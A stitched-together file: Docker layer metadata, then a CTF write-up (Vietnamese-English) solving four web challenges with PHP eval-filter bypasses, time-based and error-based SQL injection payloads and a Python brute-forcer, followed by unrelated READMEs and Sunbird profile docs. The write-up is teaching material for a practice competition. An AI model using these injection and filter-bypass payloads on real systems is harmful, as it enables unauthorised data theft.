COPY file:74e988fef607090521e63cea57b4c61ab22b3a2a131bc55f0cf4a0d9c36ce65d in /etc/phpmyadmin/config.inc.php
# Wed, 31 Mar 2021 09:22:05 GMT
COPY file:7a1864d35a5b72dc75fa085c7d09497f417e1ef1eacb8597037c366f1978b5fa in /docker-entrypoint.sh
# Wed, 31 Mar 2021 09:22:06 GMT
ENTRYPOINT ["/docker-entrypoint.sh"]
# Wed, 31 Mar 2021 09:22:06 GMT
CMD ["php-fpm"]
```
- Layers:
- `sha256:9963ac8f97a3cf1f319e6c80042725f76dce93363a3d6b65e6808e1cd1bcfd7f`
Last Modified: Tue, 30 Mar 2021 21:46:19 GMT
Size: 25.8 MB (25753755 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:371213f07fea0a0f872bf0d091f7465c36fa7dda5dd5954941ab4416869b7059`
Last Modified: Wed, 31 Mar 2021 00:43:52 GMT
Size: 227.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:938cc915f5117d6a5b05f98b4d0e1f7f16367df8d2bdb348a42a011d67843718`
Last Modified: Wed, 31 Mar 2021 00:44:02 GMT
Size: 64.7 MB (64709509 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:02470c7dad2d8dd8f8186e20fe6e989a534273373e80b8c45eb2afc1cd562287`
Last Modified: Wed, 31 Mar 2021 00:43:52 GMT
Size: 270.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:16c154eb1630eabecb460fc8372090099af3a08d4d9205c0480b650bf20c56de`
Last Modified: Wed, 31 Mar 2021 00:48:03 GMT
Size: 10.7 MB (10654498 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:f2295b91965b29324ea4a0f61aed9bb67b4490343bfeab0b2ba04acb59330f28`
Last Modified: Wed, 31 Mar 2021 00:48:00 GMT
Size: 489.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:cec7b35a44ecbf9bbd49f746c4be1f8172a8d0e65f1207e91300d90fd33b2f6d`
Last Modified: Wed, 31 Mar 2021 00:48:04 GMT
Size: 27.7 MB (27686441 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:2726db42a024f0426abcd9519e41e7657a8f47f6036ff94019c15028b01da6b3`
Last Modified: Wed, 31 Mar 2021 00:48:00 GMT
Size: 2.3 KB (2264 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:39bcf9c94af738669aecd4be2d4127c2ca208ea2367266d375145f0804244fb2`
Last Modified: Wed, 31 Mar 2021 00:48:00 GMT
Size: 245.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:51002783a640b7f8a9656724e3cdf4b5a4d5e8dd7e93c42db28ac63729774044`
Last Modified: Wed, 31 Mar 2021 00:48:00 GMT
Size: 8.4 KB (8447 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:d580b6969287d2694cbba6088857be171e302cc48fa36ce8a671ba26f65bb146`
Last Modified: Wed, 31 Mar 2021 09:22:57 GMT
Size: 2.8 MB (2802711 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:c9498329cf495d75dff54165a027df6cc8f3203c75f174a2da14c07e7778ff2b`
Last Modified: Wed, 31 Mar 2021 09:22:56 GMT
Size: 547.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:f111dd951b73f348db5b82c3e40501467ddbb6d25c76a41c58108242dcde0ac2`
Last Modified: Wed, 31 Mar 2021 09:23:02 GMT
Size: 14.1 MB (14064174 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:98069cb0c924fd3ebfc7aac20f968743869421537fca0f43c0a3eeaa9d6747b5`
Last Modified: Wed, 31 Mar 2021 09:22:56 GMT
Size: 1.5 KB (1527 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:5a761df3372bd96d17805b2264333a2899b709ea16e4c66642ebf33cd7fadffb`
Last Modified: Wed, 31 Mar 2021 09:22:56 GMT
Size: 772.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
layout: post
title: "WRITEUP WEB-VKL CTF 2021: WEB"
categories: CTF
toc: true
---
Ở bài này mình chỉ viết về 4 challenge của mình nha. (Eval ga VKL 1, Eval ga VKL 2, Baby SQL, FreeFlag).
Source tất cả các bài mình để ở đây [SOURCE](https://github.com/DauHoangTai/CTF/tree/master/2021/webvkl-CTF)
## Challenge Eval ga VKL 1 (5 solved)
Đầu tiên truy cập chall thì chúng ta được nhận 1 source code như sau.
```php
<?php
error_reporting(0);
chdir("/");
if (isset($_GET['cmd'])) {
$cmd = $_GET['cmd'];
if (preg_match("/[3-9`~!@#\$%^&*\-=+,;?'\"\[\]\{\}\\\\]|0|pcntl|highlight_file|var|root|func|contents|eval|count|cmp/i",$cmd) || substr_count($cmd,'.') > 2 || strlen($cmd) > 64) {
die("ấu nâu !");
} else {
eval($cmd.";");
}
} else {
highlight_file(__FILE__);
}
?>
```
The input `cmd` is filtered fairly strictly: the request dies if the input contains two or more dots, and its length is limited to under 65 characters. Note, however, that `system`, `exec` and the other RCE-capable functions are absent from the blacklist.
Trying `?cmd=system(id)` returns a blank page => life is not that easy.
Reading phpinfo() shows that the RCE-capable functions are all in `disable_functions`.
Now let's look at which characters and functions are still usable: `chr strlen log log1p 2 1 print_r readfile end current next` are some of them. To be thorough, you can write a small script that diffs `disable_functions` against PHP's full function list to see exactly which ones survive.
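A minimal sketch of that diff, meant to run locally — the `disable_functions` string below is a hypothetical excerpt, so paste the real value from the target's phpinfo():

```php
<?php
// Hypothetical excerpt of the target's disable_functions; replace with the real value.
// Assumes your local PHP build defines roughly the same built-ins as the target.
$ini      = 'system,exec,shell_exec,passthru,popen,proc_open';
$disabled = array_map('trim', explode(',', $ini));
// get_defined_functions()['internal'] lists every built-in function PHP defines.
$allowed  = array_diff(get_defined_functions()['internal'], $disabled);
print_r(array_values($allowed)); // candidates for building a payload
```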
### Payload
```
List the files and folders in / -> print_r(scandir(chr(strlen(log1p(1).log1p(1).log1p(2)))))
The flag shows up at the end of the returned array
Read the flag -> readfile(end(scandir(chr(strlen(log1p(1).log1p(1).log1p(2))))))
```
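A quick local sanity check of the number-building trick (my own sketch; it assumes PHP's default `precision=14`, which makes the concatenated string exactly 47 characters long — and `chr(47)` is `/`):

```php
<?php
// log1p(1) stringifies as "0.69314718055995" (16 chars) and log1p(2) as
// "1.0986122886681" (15 chars) under the default precision=14 => 16+16+15 = 47.
$s = log1p(1) . log1p(1) . log1p(2);
echo strlen($s), "\n";             // 47
echo chr(strlen($s)), "\n";        // "/"
print_r(scandir(chr(strlen($s)))); // root listing; the flag file sits at the end
```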
To make it easier to follow, here is a quick debug:

Flag -> `web-vkl{dm_ch4ll_3z_vllllllll_!!!}`
## Challenge Eval ga VKL 2 (3 solved)
This challenge hands out its source the same way as part 1.
```php
<?php
error_reporting(0);
chdir("/");
if (isset($_GET['cmd'])) {
$cmd = $_GET['cmd'];
if (preg_match("/[3-9`~!@#\$%^&*\-=+.,;?'\"\[\]\{\}\\\\]|\([2]|\_[a-q]|0|1|pcntl|highlight_file|var|root|len|func|contents|eval|count|cmp/i",$cmd) || substr_count($cmd,'ext') > 1 || substr_count($cmd,'scan') > 1) {
die("ấu nâu !");
} else {
eval($cmd.";");
}
} else {
highlight_file(__FILE__);
}
?>
```
Reading it, the version 1 payload no longer works: `len` and the digits `0` and `1` are now filtered, a `2` immediately after `(` is banned, and so is any of `a-q` immediately after `_`. `ext` and `scan` may each appear at most once; the point of that is to stop `next` and `scandir` from appearing in the input more than once.
The disabled-functions list has been relaxed to allow `array_reverse` as well; you will see it if you re-check. But the filters still miss `getallheaders()` => let's just use that :))
### Payload

Add the header `cc: /` and send a GET to `?cmd=print_r(next(getallheaders()))`. At this point we can produce `/`, so we just use scandir to list files and folders.
`print_r(scandir(next(getallheaders())))` -> the flag sits in the second element from the end of the array and is named `vaday_la_flag_hahah_hihihi_hoho.txt`.
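A minimal sketch of sending that request with Python (my own addition; the URL is an assumption). `next()` returns the header right after `Host`, so the client has to send `cc` as the very next header, which is why the default headers are cleared:

```python
import requests

BASE = "http://target/"   # hypothetical challenge URL

s = requests.Session()
s.headers.clear()         # drop default headers so "cc" arrives right after Host
r = s.get(
    BASE,
    params={"cmd": "print_r(scandir(next(getallheaders())))"},
    headers={"cc": "/"},
)
print(r.text)
```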
Finally, read the flag.

Flag -> `web-vkl{Wow_w0w_writ3_p4yl0ad_1n_5s_3625146215!}`
## Challenge Baby SQL (0 solved)
First, register an account and log in with it. Once logged in, you can see the account has 20 stars and its status is set to 1. To get into `/flag`, you need at least 100 stars.
Here I simply create a second account and transfer `-100` stars from it, which leaves my account with 120 stars. (Initially I planned to validate negative numbers and make everyone race the transfer instead, but to tone things down I went with this quicker route :3)
Getting into flag.php, we receive the following source code:
```php
<?php
session_start();
include_once("config.php");
$stmt = $conn->prepare('select * from users where username=?');
if (!$stmt)
throw new Exception("prepare query error:" . $conn->error);
$stmt->bind_param('s', $_SESSION['username']);
$stmt->execute();
$result = $stmt->get_result();
while ($row = $result->fetch_assoc()) {
$checkStar = $row['star'];
}
if ($checkStar >= 100) {
if (isset($_GET['pass'])) {
$pass = $_GET['pass'];
if (preg_match("/user|insert|ord|chr|version|len|mid|like|right|substr|exp|cur|ascii|=|and|or|0x|between|rand|convert|sleep|xml|extract|concat|info|sys|[0-9~\/\"<>!^;\\\]/i",$pass)) {
die("no hack");
} else {
// $query = "SELECT flag_ne_hihi FROM flag_here;";
$query = "SELECT pass FROM users1 where user = 'guest' and pass = '{$pass}';";
$result = @mysqli_fetch_array(mysqli_query($conn,$query));
if($result['pass']) {
// echo "wtf ?";
}
}
} else {
highlight_file(__FILE__);
}
} else {
die ("<script>alert('Not enough stars :( min 100 stars')</script>");
}
?>
```
First, the `pass` input is placed straight into the SQL query, and the `'` character is not filtered => we can SQL inject here.
After the query executes, nothing is printed even when a `pass` row comes back => that alone is enough to tell this is time-based SQLi.
The main obstacle is the `preg_match` filter. I filtered nearly every function usable for blind SQLi, most notably `sleep`, the usual tool for time-based SQLi, and I also filtered the digits [0-9].
In MySQL we can use `benchmark`, much like `sleep`, to delay the server's responses, provided its parameters are large enough. If you haven't seen it before, look it up on Google for a better understanding.
`left` is not filtered either, so it can stand in for `substr`.
`in` stands in for `=`, `like`, `>`, `<`.
The hard part is constructing numbers; for that I use `INSTR()`. Briefly, this function returns the position of the substring you pass in: e.g. INSTR("a","a") is 1 and INSTR("ba","a") is 2 => we can build numbers.
Now we need a number large enough for `benchmark()` to noticeably delay the server. Here I use `pow()` together with `pi()` to produce a sufficiently large value => easy time-based injection.
### Payload
```
' || left((select flag_ne_hihi from flag_here),(INSTR('a','a')))in('w')%26%26benchmark((pow(pi()%2bpi(),pi()*pi())),(INSTR('a','a')))%23
```
When you run the payload above, you will see the server being delayed.
I put the letter `w` inside `IN` because it is the first character of the flag, so the response is delayed; with any other character there is no comparable delay. From here you can write code and brute-force the rest (a sketch follows).
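Here is a rough brute-forcer for it (my own addition, not the original exploit script; the URL, session cookie, and 3-second threshold are assumptions to adapt to the real target):

```python
import string
import time

import requests

URL = "http://target/flag.php"            # hypothetical endpoint
COOKIES = {"PHPSESSID": "your-session"}   # hypothetical logged-in session

def number(n: int) -> str:
    # Build the integer n without using digits: INSTR('a...ab','b') == n
    return f"INSTR('{'a' * (n - 1)}b','b')"

def is_prefix(guess: str) -> bool:
    payload = (
        f"' || left((select flag_ne_hihi from flag_here),({number(len(guess))}))"
        f"in('{guess}')&&benchmark((pow(pi()+pi(),pi()*pi())),(INSTR('a','a')))#"
    )
    start = time.time()
    requests.get(URL, params={"pass": payload}, cookies=COOKIES, timeout=60)
    return time.time() - start > 3.0      # delayed response => valid prefix

flag = "w"
charset = string.ascii_letters + "_-{}"   # digits are filtered server-side anyway
while not flag.endswith("}"):
    for ch in charset:
        # NOTE: a candidate containing a filtered word (e.g. "or") would be
        # rejected by the regex and needs special handling.
        if is_prefix(flag + ch):
            flag += ch
            print(flag)
            break
    else:
        break                             # no candidate matched; stop
```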
Flag -> `web-vkl{Wow_You_Are_Hacker_Sju_Cap}`
## Challenge FreeFlag (1 solved)
After registering and logging in, we receive the following source:
```php
<?php
session_start();
include_once("config.php");
if (isset($_SESSION['username'])) {
if (isset($_GET['id'])) {
$id = $_GET['id'];
if (preg_match("/insert|substr|mid|left|right|ord|pi|chr|sys|0x|version|concat|ascii|convert|and|or|procedure|xml|extract|by|create|like|sleep|if|case|db|load|to|count|where|column|rand|in|[1-9`~.^\-\/\\\=<>|$]/i",$id)) {
die("nope !");
} else {
$query1 = "SELECT * FROM numbers where id = {$id};";
$result = $conn->query($query1);
while ($row = $result->fetch_assoc()) { //db 2 column
$number = $row['number'];
// echo $number;
if ((int)$number === 2050 || (int)$number === 2051) {
$_SESSION["admin"] = true;
header("Location: flag.php");
}
else {
die("Try harder :) ");
}
}
}
} else {
highlight_file(__FILE__);
}
} else {
header("Location: login.php");
}
?>
```
Our input is `id`, which is filtered against a long list of MySQL functions, the digits 1-9, and several characters. `id` is placed straight into the query, so we can SQL inject here. To be redirected to `flag.php`, the query `$query1 = "SELECT * FROM numbers where id = {$id};"` must return a row whose `number` column is 2050 or 2051. In that case `$_SESSION["admin"]` is set to true; by default, every freshly registered account has it set to false.
The reason for 2050 and 2051 is that the CTF ran for two days, 21-08-2021 and 22-08-2021; summing day + month + year gives 2050 and 2051 respectively. So I use the following payload to get redirected to `flag.php` (a quick check of this arithmetic follows the payload):
```
?id=0 union select 0,(select((select (day(curdate()))) %2b (select(month(curdate()))) %2b (select(year(curdate())))));
```
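A quick sanity check of that arithmetic (my own addition):

```python
from datetime import date

for d in (date(2021, 8, 21), date(2021, 8, 22)):
    print(d, d.day + d.month + d.year)   # -> 2050 and 2051
```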
Once on `flag.php`, viewing the page source reveals `?source` => access it to get the source:
```php
<?php
include_once("config.php");
if (isset($_SESSION["admin"]) && $_SESSION["admin"] === true) {
if (isset($_GET['id'])) {
$id = $_GET['id'];
if (preg_match("/insert|substr|mid|left|right|ord|chr|sys|pi|rand|0x|version|concat|ascii|convert|and|or|procedure|xml|extract|by|create|like|sleep|if|case|db|load|to|count|where|column|in|[1-9`~.^\-\/\\\=<>|$*]/i",$id) || substr_count($id,'0') > 1) {
die("no hack");
} else {
$query = "SELECT id,flag_name,flag_fake FROM flag WHERE id={$id};";
$result = $conn->query($query);
while ($row = $result->fetch_assoc()) {
echo "<tr><th>".$row['id']."</th><th>".$row['flag_name']."</th><th>".$row['flag_fake'];
}
}
}
if(isset($_GET['ai_di'])) {
$ai_di = $_GET['ai_di'];
if (preg_match("/insert|substr|mid|left|right|ord|chr|sys|pi|rand|0x|version|concat|ascii|convert|and|or|procedure|xml|extract|by|create|like|sleep|if|case|db|load|to|count|where|column|in|[2-9`~.^\-\/\\\=<>|$]/i",$ai_di) || substr_count($ai_di,'1') > 1 || substr_count($ai_di,'0') > 2) {
die("hack ghe vay bro ?");
} else {
$query = "SELECT id,flag_name,flag_fake FROM flag WHERE id={$ai_di};";
$result = mysqli_query($conn,$query);
if (!$result) {
echo mysqli_error($conn);
} else {
echo "nice!";
}
}
}
} else {
die("no admin");
}
if (isset($_GET['source'])) {
readfile("flag.php");
}
?>
```
First, this source accepts three input parameters: `id`, `ai_di`, and `source`. `source` does nothing but read a file (to show the source). `id` goes through a preg_match that filters several MySQL functions, the digits 1-9, and a few characters; `0` may not appear more than once in the input.
A few usable things remain, such as `union select from 0 ()` and a few others; you can hunt for more :)).
`$query = "SELECT id,flag_name,flag_fake FROM flag WHERE id={$id};";` our `id` is placed into this query, and the values `id`, `flag_name`, `flag_fake` are then fetched and shown on screen.
Since the `id` filter still allows `0`, we can try id=0:

Looking at this, it is clear the real flag is not in these three columns; we need to find another column that contains it.
Moving on to `ai_di`: it filters MySQL functions just like `id` does, and the same characters, except that only the digits 2-9 are filtered, `1` may not appear more than once, and `0` may not appear more than twice in the input.
```php
$query = "SELECT id,flag_name,flag_fake FROM flag WHERE id={$ai_di};";
$result = mysqli_query($conn,$query);
if (!$result) {
echo mysqli_error($conn);
} else {
echo "nice!";
}
```
`ai_di` is inserted into the query above, which is then executed. If there is an error, the query's error message is dumped via `echo mysqli_error($conn);`. A successful execution just prints `nice!`.
Looking at the code above, anyone can guess that this is the place to dump the remaining columns of the `flag` table (error-based SQL injection), and then use the original `?id` to read that column's data.
The preg_match filter misses some math functions such as `exp` and `power`; given a large enough argument, they return a result that overflows the allowed numeric range and dumps an error, which I chain with my query => the column name gets dumped. You can Google these two functions and how to use them to dump the columns of a table.
I will leave the reference article here:
[Error Based SQL Injection Using EXP](https://osandamalith.com/2015/07/15/error-based-sql-injection-using-exp/). In that article, however, they use `~` or pass numbers directly, both of which I filtered. Only the digit 0 survives, and no matter how many 0s you enter, you cannot overflow the numeric range with it.
At this point, anyone who got past step 1 into `flag.php` has it easy, hehe: that step was all about constructing numbers, and now we just reuse the same trick.
### Payload
I will include the full payloads, starting from step 1:
```
Payload to become admin -> ?id=0 union select 0,(select((select (day(curdate()))) %2b (select(month(curdate()))) %2b (select(year(curdate())))))
Payload to dump the column -> ?ai_di=0 *(select (exp((SELECT year(curdate())) %2b (select 0 from (SELECT * from flag limit 1) as a))))
Payload to read the flag -> ?id = 0 union select null,null,(select flag_real_siu_cap from flag)
```
This challenge got one solve, and that solver used hex; you can read up on hex and use it as well. I had forgotten about that function :3
## Closing Words
Thanks to everyone who took part in WEB-VKL CTF 2021. I hope it was a chance for everyone to practice the skills they have learned, and that it helped some of you pick up new knowledge. If there were any mistakes in the challenges, please forgive them ♥
THANK YOU!
| 50.764925 | 436 | 0.639544 | vie_Latn | 0.999997 |
977dfa47ac3657a78c65dde19882c2765174d937 | 2,332 | md | Markdown | README.md | ferbaco86/js-tic-tac-toe | 5b7a5788f4ae82c9099595fb7e805998a4530c89 | [
"MIT"
] | 12 | 2020-09-09T00:00:56.000Z | 2021-04-12T23:29:16.000Z | README.md | kbjude/js-tic-tac-toe | 5b7a5788f4ae82c9099595fb7e805998a4530c89 | [
"MIT"
] | 1 | 2020-09-07T14:23:42.000Z | 2020-09-13T20:07:09.000Z | README.md | kbjude/js-tic-tac-toe | 5b7a5788f4ae82c9099595fb7e805998a4530c89 | [
"MIT"
] | 1 | 2021-06-28T17:38:29.000Z | 2021-06-28T17:38:29.000Z | # js-tic-tac-toe
A collaborative tic-tac-toe project aimed at letting two users play against each other. A game can end in one of three states: a win, a loss, or a draw. After entering their names, each user is given a symbol that identifies them on the board.
## Requirements
- Ensure that you have Node.js installed on your computer
- Have a browser that supports HTML5
## Features
Some of the features of this project include, but are not limited to:
- Simple animated intro
- 8-bit retro feel for the game UI
- Inputs for registering players' names
- For this implementation, player one will have the symbol "X" and player two the symbol "O"
## Instructions
- Make your first move by clicking on the board where you want to position your symbol
- Wait for the other player to do the same
- The first player to create a three-in-a-row sequence of their symbol wins
- The sequence can either be vertical, horizontal, or diagonal
- If all squares are occupied by a symbol and there is no winning combination, the game is considered a tie
## Screenshots


## Using the System
- Clone the project from GitHub to your local computer
- Be sure to add the Live Server extension for VS Code if you are using it
- Live Server will run the code for you in your default browser
## Live Version
https://tic-tac-toe-javascript.netlify.app/
## Technologies Used
- Vanilla JS
- HTML
- CSS
- NES.css
## Potential Features
- Add chip-tunes for background music
- Animate UI transitions
## Contributors
👤 **Jude Kajura**
- GitHub: [@kbjude](https://github.com/kbjude)
- Twitter:[@balindakj](https://twitter.com/balindakj)
- LinkedIn: [kajura-jude](https://www.linkedin.com/feed/)
👤 **Fernando Bahamondes**
- Github: [@ferbaco86](https://github.com/ferbaco86)
- Twitter: [@ferbac0](https://twitter.com/ferbac0)
- LinkedIn: [fernando-bahamondes](https://www.linkedin.com/in/fernando-bahamondes-correa)
## Acknowledgments
- 512 Sound Effects (8-bit style) by [SubspaceAudio](https://opengameart.org/content/512-sound-effects-8-bit-style) | 35.876923 | 269 | 0.754717 | eng_Latn | 0.978026 |
977e9dbccb6f27b42a3bd3cfdd332a8f1b94a55c | 6,866 | md | Markdown | pages/features-documentation/userprofile.md | lakhanmandloi/project-sunbird.github.io | 27fb2df4d87f4508a987e471d661ff35d74e83f5 | [
"MIT"
] | 7 | 2017-11-07T00:40:47.000Z | 2021-06-26T09:45:37.000Z | pages/features-documentation/userprofile.md | lakhanmandloi/project-sunbird.github.io | 27fb2df4d87f4508a987e471d661ff35d74e83f5 | [
"MIT"
] | 558 | 2017-09-28T11:52:53.000Z | 2018-12-21T09:48:54.000Z | pages/features-documentation/userprofile.md | lakhanmandloi/project-sunbird.github.io | 27fb2df4d87f4508a987e471d661ff35d74e83f5 | [
"MIT"
] | 87 | 2017-09-27T10:02:44.000Z | 2018-11-12T06:16:40.000Z | ---
type: landing
directory: features-documentation
title: User Profile
page_title: User Profile
description: User Profile
keywords: 'Profile, create profile, log in, sign in '
published: true
allowSearch: true
---
## Overview
Creating and updating a profile on the Sunbird platform is a seamless process. It allows users to extend their profile and provide information related to their experience, skills, education, awards, etc. Providing this information helps the system recommend personalized courses to upgrade your skills, select you for custom programs, connect you to others in the community, and build bridges for collaboration. You may choose to create, update, or edit your profile information at any time.
<b>Note</b>: Enter details in all mandatory fields. You cannot submit the form if any mandatory field is left blank; in such a case, an error message is displayed. Close the message box and provide the required details before you proceed to submit the form.
### Prerequisites
<table>
<tr>
<th style="width:35%;">Step</th>
<th style="width:65%;">Screen</th>
</tr>
<tr>
<td>1. You are logged in <br>2. You are currently on the <b>Home</b> page <br>3. To add or edit your personal information, you have clicked the <b>Profile</b> tab
</td>
<td><img src="pages/features-documentation/images/profile/prerequisite.png"></td>
</tr>
</table>
### Viewing Profile and Adding Image
<table>
<tr>
<th style="width:35%;">Step</th>
<th style="width:65%;">Screen</th>
</tr>
<tr>
<td>1. Login with the registered credential <br>2. Click <b>Profile</b> tab on the header<br>Or <br>3. Click <b>Profile</b> to the right</td>
<td><img src="pages/features-documentation/images/profileimg1.png"></td>
</tr>
<tr>
<td>1. Depending on your organization, some information is already available, such as your <b>Username</b> and the <b>City</b> you belong to <br>2. Click the <b>Edit</b> icon on your profile to add a profile image. For details on adding an image to your profile, refer to <a href="features-documentation/metadata_addingimages" target="_blank">Adding Images</a> <br>3. You can also see your <b>Last Login Time</b> <br><br><b>Note:</b> Maximum image upload size is 4 MB</td>
<td><img src="pages/features-documentation/images/profileimg2.png"></td>
</tr>
</table>
### Selecting Organization Types
<table>
<tr>
<th style="width:35%;">Step</th>
<th style="width:65%;">Screen</th>
</tr>
<tr>
<td>1. Click <b>Search</b> dropdown button <br>2. Select <b>Organizations</b> from the dropdown list <br>3. Click <b>Filter</b> icon <br>4. Select <b>Organization Type</b> from the dropdown list <br>5. Click <b>Apply</b> to associate an organization with the organization type <br>6. Click <b>Reset</b> button to select attributes again</td>
<td><img src="pages/features-documentation/images/setuporgtype.png"></td>
</tr>
</table>
### Filtering Profile by Attributes
<table>
<tr>
<th style="width:35%;">Step</th>
<th style="width:65%;">Screen</th>
</tr>
<tr>
<td>1. Click <b>Search</b> dropdown button <br>2. Select <b>Users</b> from the dropdown list <br>3. Click <b>Filter</b> icon <br>4. You can filter the profile by: <li><b>Grades</b></li>
<li><b>Medium</b></li>
<li><b>Subjects</b></li>
<li><b>Roles</b></li>
<li><b>Location</b></li>
<br>5. Click <b>Apply</b> to tag an organization with the organization type <br>6. Click <b>Reset</b> to select attributes again</td>
<td><img src="pages/features-documentation/images/profileattribute.png"></td>
</tr>
</table>
### Viewing Profile Completeness Status
<table>
<tr>
<th style="width:35%;">Step</th>
<th style="width:65%;">Screen</th>
</tr>
<tr>
<td>1. You can see your <b>Profile Completeness</b> status, indicated by the profile completeness bar and percentage <br>2. Click the <b>Plus</b> icon to add details, viz. <b>Profile Description, Language known, Profile picture</b></td>
<td><img src="pages/features-documentation/images/profilestatus.png"></td>
</tr>
<tr>
<td>You can add or edit the Profile Summary details: <br>1. Enter a <b>Description</b> <br>2. You can show or hide your description from others <br>3. Click <b>Save</b> to save the description <br>4. Click <b>Close</b> to exit the page</td>
<td><img src="pages/features-documentation/images/profile_summary.png"></td>
</tr>
</table>
### Viewing Certifications and Awards
<table>
<tr>
<th style="width:35%;">Step</th>
<th style="width:65%;">Screen</th>
</tr>
<tr>
<td>Badges are added to your profile after you complete a course</td>
<td><img src="pages/features-documentation/images/badges.png"></td>
</tr>
</table>
### Adding or Editing Profile Details
<table>
<tr>
<th style="width:35%;">Step</th>
<th style="width:65%;">Screen</th>
</tr>
<tr>
<td><b>Experience</b> <br>Add or edit your experience details, such as work title, organization, designation, joining date, subject taught etc. You can show or hide your experience details from others</td>
<td><img src="pages/features-documentation/images/profile_experience.png"></td>
</tr>
<tr>
<td><b>Address</b> <br>Add or edit your permanent or current address. You can show or hide the address details from others</td>
<td><img src="pages/features-documentation/images/profile_address.png"></td>
</tr>
<tr>
<td><b>Education</b> <br>Add or edit your academic qualifications, such as degree, year of passing, percentage, board/university, etc. You can show or hide your academic details from others</td>
<td><img src="pages/features-documentation/images/profile_education.png"></td>
</tr>
<tr>
<td><b>Skill Tags</b> <br>1. Click <b>Edit</b> <br>2. You can show or hide your skill details from others <br>3. Select the skill set that you want to add from the drop-down <br>4. Click <b>Save</b> to save the details</td>
<td><img src="pages/features-documentation/images/profile/skill.png"></td>
</tr>
<tr>
<td><b>Skill Endorsement</b> <br>1. Click <b>View More</b> dropdown in <b>Skill Tags</b> section <br>2. Click <b>+</b> icon to endorse for a particular skill <br>3. Click <b>View Less</b> to collapse the Skill Tags page</td>
<td><img src="pages/features-documentation/images/profile_endorsment.png"></td>
</tr>
<tr>
<td><b>Additional Information</b> <br>1. Add or edit personal information such as name, phone number, date of birth, location, languages known, etc <br>2. Add your <b>Social Media Links</b> such as Facebook, Twitter, LinkedIn etc <br>3. Click <b>Save</b> button to save the changes</td>
<td><img src="pages/features-documentation/images/profile_additionalinfo.png"></td>
</tr>
</table>
| 48.695035 | 492 | 0.682348 | eng_Latn | 0.884234 |
977ed4e98e690a80e9cadc76fa6e55dd8f2c3eec | 1,750 | md | Markdown | README.md | thiagoblima/color-catalog | eda4e988febd95508be8c4d84fb7cabee4041d9b | [
"MIT"
] | null | null | null | README.md | thiagoblima/color-catalog | eda4e988febd95508be8c4d84fb7cabee4041d9b | [
"MIT"
] | 4 | 2020-09-19T01:45:10.000Z | 2020-09-20T02:05:32.000Z | README.md | thiagoblima/color-catalog | eda4e988febd95508be8c4d84fb7cabee4041d9b | [
"MIT"
] | null | null | null | # Color Catalog - React Native
> A React Native study and experimentation repository, written for general learning and knowledge sharing.

## Expo
This repository uses *Expo*; here is its link:
> https://expo.io/learn
Building native apps for _iOS_ and _Android_ with *React Native*:
1. First of all, install the *Expo CLI*:
```
npm install expo-cli --global
```
2. Adding _React Navigation_ to the project:
```
npm install @react-navigation/native
```
3. Adding _Expo/ReactNative_ dependencies:
```
expo install react-native-gesture-handler react-native-reanimated react-native-screens react-native-safe-area-context @react-native-community/masked-view
```
4. You should be all set to start it with the well-known command:
```
npm start
```
## Release History
* 0.2.1
* CHANGE: Update docs (module code remains unchanged)
* 0.2.0
* CHANGE: Remove `setDefaultXYZ()`
* ADD: Add `init()`
* 0.1.1
* FIX: Crash when calling `baz()` (Thanks @GenerousContributorName!)
* 0.1.0
* The first proper release
* CHANGE: Rename `foo()` to `bar()`
* 0.0.1
* Work in progress
## Meta
Thiago Lima
Distributed under the XYZ license. See ``LICENSE`` for more information.
[https://github.com/thiagoblima/color-catalog/blob/master/LICENSE](https://github.com/thiagoblima/color-catalog/blob/master/LICENSE)
## Contributing
1. Fork it (<https://github.com/thiagoblima/color-catalog/fork>)
2. Create your feature branch (`git checkout -b feature/fooBar`)
3. Commit your changes (`git commit -am 'Add some fooBar'`)
4. Push to the branch (`git push origin feature/fooBar`)
5. Create a new Pull Request
[wiki]: https://github.com/thiagoblima/color-catalog/wiki | 25 | 153 | 0.722857 | eng_Latn | 0.810287 |
977f609d73d8e16a053f1da531dea5f6b19ba5a3 | 419 | md | Markdown | _portfolio/portfolio-2.md | arvindsaripalli/arvindsaripalli.github.io | 176c82ce936db30360f6420ea9aa404311e9d22f | [
"MIT"
] | null | null | null | _portfolio/portfolio-2.md | arvindsaripalli/arvindsaripalli.github.io | 176c82ce936db30360f6420ea9aa404311e9d22f | [
"MIT"
] | null | null | null | _portfolio/portfolio-2.md | arvindsaripalli/arvindsaripalli.github.io | 176c82ce936db30360f6420ea9aa404311e9d22f | [
"MIT"
] | null | null | null | ---
title: "Reordering Spotify Playlists"
excerpt: "What's the best order to listen your playlists or music library in?"
collection: portfolio
---
[Spotiflow](https://github.com/arvindsaripalli/Spotiflow) is a program that lets you reorganize
the order of your playlists <em>optimally</em>. It does this by picking songs that are <em>closest</em>
to each other based on song metadata.
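A minimal sketch of that idea (my own illustration; Spotiflow's actual algorithm and feature set may differ): greedily pick, at each step, the unplayed song whose metadata vector is nearest the current one.

```python
from math import dist

songs = {
    "Track A": (0.8, 0.6, 0.1),   # e.g. (energy, danceability, acousticness)
    "Track B": (0.7, 0.5, 0.2),
    "Track C": (0.1, 0.2, 0.9),
}

def reorder(features):
    remaining = dict(features)
    order = [min(remaining)]                # arbitrary deterministic start
    current = remaining.pop(order[0])
    while remaining:
        # pick the unplayed song whose features are closest to the current one
        nxt = min(remaining, key=lambda s: dist(remaining[s], current))
        order.append(nxt)
        current = remaining.pop(nxt)
    return order

print(reorder(songs))                       # ['Track A', 'Track B', 'Track C']
```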
Hacked together at SDHacks 2017. | 41.9 | 103 | 0.77327 | eng_Latn | 0.998273 |
